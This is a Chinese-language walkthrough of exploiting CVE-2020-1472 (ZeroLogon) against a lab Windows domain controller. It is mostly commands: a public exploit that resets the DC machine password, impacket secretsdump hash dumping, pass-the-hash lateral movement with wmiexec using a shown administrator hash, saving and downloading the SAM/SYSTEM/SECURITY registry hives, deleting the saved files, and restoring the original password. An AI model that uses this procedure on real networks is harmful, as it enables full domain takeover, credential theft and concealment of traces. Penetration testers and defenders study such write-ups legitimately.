ZeroLogon域控置空密码漏洞

在今年9月份，国外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞详情，网上也随即公开了Exp。是近几年windows上比较重量级别的一个漏洞。通过该漏洞，攻击者只需能够访问域控的445端口，在无需任何凭据的情况下能拿到域管的权限。该漏洞的产生来源于Netlogon协议认证的加密模块存在缺陷，导致攻击者可以在没有凭证的情况情况下通过认证。该漏洞的最稳定利用是调用netlogon中RPC函数NetrServerPasswordSet2来重置域控的密码，从而以域控的身份进行Dcsync获取域管权限。

CVE-2020-1472 —- ZeroLogon

验证
目标机器是存在漏洞的，说明我们可以利用

利用

exp验证脚本：https://github.com/dirkjanm/CVE-2020-1472

接下来我们使用exp进行重置域控密码
python3 cve-2020-1472-exploit.py dc 192.168.2.100

获取hash

接下来就是获取域控机器的hash
这里面我们使用impacket套件里面的secretsdump来进行hash
/impacket-master/examples/secretsdump.py

python3 secretsdump.py test.com/dc\$@192.168.2.100 -no-pass

横向移动
当我们拿到域控机器所有用户的hash之后，可以尝试使用wmiexec进行横向渗透
我们拿administrator的这一段出来进行横向

aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 test.com/administrator@192.168.2.100

至此利用结束

恢复域控密码方法
先导出sam，要在交互式shell模式下才可以

可以回到原来这一步：python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 test.com/administrator@192.168.2.100

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

像这些步骤，这个文件security.save会保存到目标机器当前的c盘，所以需要我们把它下载到我们的攻击机

这样的三步骤(get security.save)，就是下载文件回到我们的机器上的

下载回来之后，再将目标机器的三个文件删除干净

执行完以上命令，会保存三个文件，这三个文件都是lsass原本的密码。我们将原本的密码倒出来，然后查看原本的hash进行恢复如初

再次获取hash

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

最后，在使用reinstall_original_pw.py来恢复，这个比较暴力，再打一次，计算密码的时候使用了空密码的hash去计算session_key。

把这一段复制下来

python3 reinstall_original_pw.py dc 192.168.2.100 d8b1bb7aa74ceee706ddf4bbf27ddd6138a643cd5339e4d1c509eb8532724c0eef0555c3e1ac8a3cceb297bf63fd16d86043071fb5445ef493139b3ad1a32ea937611986544ba00b037292ca489e3abb6e283ea3fa793aed7a4478e5c1ef1152c3ea531df0d3918c682fd6aefeb3b4781c03bea1996660e7f8256d9c7f7a6628a64a760915571a69ecaac1fe8908a32befcfb0c9d4fe66507d25a123cb931693ea3cada3b37250e3916957e90df8ddfd443c0ff795210718a9e9cde0f64b13806340139f9dcf97f848c67ecf622b129987c0542828a5efb17da0645486c08ed0066592a4cc1c787c9fbd287f8c6d855d

可以发现AD域管的密码已经恢复如初了
复制这一段密码

可以使用原来的密码正常获取机器hash信息，说明已经恢复如初了
python3 secretsdump.py dc.qwe.com/administrator@192.168.2.100 -hashes :e19ccf75ee54e06b06a5907af13cef42